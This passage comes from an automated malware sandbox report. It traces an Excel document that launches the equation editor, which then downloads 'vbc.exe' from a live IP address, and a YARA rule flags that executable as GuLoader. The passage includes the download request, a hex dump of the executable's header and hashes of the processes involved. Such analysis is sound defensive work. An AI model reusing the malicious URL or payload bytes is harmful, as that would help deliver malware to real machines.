        Sep 14, 2021 21:51:37.568537951 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568550110 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568552971 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568569899 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568578959 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568582058 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568598032 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568602085 CEST4916580192.168.2.22212.192.246.25
        Sep 14, 2021 21:51:37.568614006 CEST8049165212.192.246.25192.168.2.22
        Sep 14, 2021 21:51:37.568620920 CEST4916580192.168.2.22212.192.246.25

        HTTP Request Dependency Graph

        • 212.192.246.25

        HTTP Packets

        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249165212.192.246.2580C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampkBytes transferredDirectionData
        Sep 14, 2021 21:51:37.438657045 CEST0OUTGET /rever/vbc.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 212.192.246.25
        Connection: Keep-Alive
        Sep 14, 2021 21:51:37.473706961 CEST1INHTTP/1.1 200 OK
        Date: Tue, 14 Sep 2021 19:51:37 GMT
        Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
        Last-Modified: Mon, 13 Sep 2021 23:18:39 GMT
        ETag: "21000-5cbe8af7096b4"
        Accept-Ranges: bytes
        Content-Length: 135168
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 36 a4 c9 93 57 ca 9a 93 57 ca 9a 93 57 ca 9a 10 4b c4 9a 92 57 ca 9a dc 75 c3 9a 9a 57 ca 9a a5 71 c7 9a 92 57 ca 9a 52 69 63 68 93 57 ca 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 db 56 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 90 00 00 00 00 00 00 70 13 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 50 02 00 00 10 00 00 b5 a3 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 b9 01 00 28 00 00 00 00 10 02 00 22 3b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 24 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 64 45 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 22 3b 00 00 00 10 02 00 00 40 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6WWWKWuWqWRichWPELVVp@P$(";8 $.text `.datadE@.rsrc";@@@IMSVBVM60.DLL


        Code Manipulations

        Statistics

        Behavior

        Click to jump to process

        System Behavior

        General

        Start time:21:50:25
        Start date:14/09/2021
        Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        Wow64 process (32bit):false
        Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
        Imagebase:0x13ff60000
        File size:28253536 bytes
        MD5 hash:D53B85E21886D2AF9815C377537BCAC3
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:moderate

        General

        Start time:21:50:47
        Start date:14/09/2021
        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        Wow64 process (32bit):true
        Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
        Imagebase:0x400000
        File size:543304 bytes
        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high

        General

        Start time:21:50:48
        Start date:14/09/2021
        Path:C:\Users\Public\vbc.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\Public\vbc.exe'
        Imagebase:0x400000
        File size:135168 bytes
        MD5 hash:ED004FE1AA9F4FA169A05B6716C03484
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:Visual Basic
        Yara matches:
        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Author: Joe Security
        Antivirus matches:
        • Detection: 100%, Joe Sandbox ML
        Reputation:low

        Disassembly

        Code Analysis

        Reset < >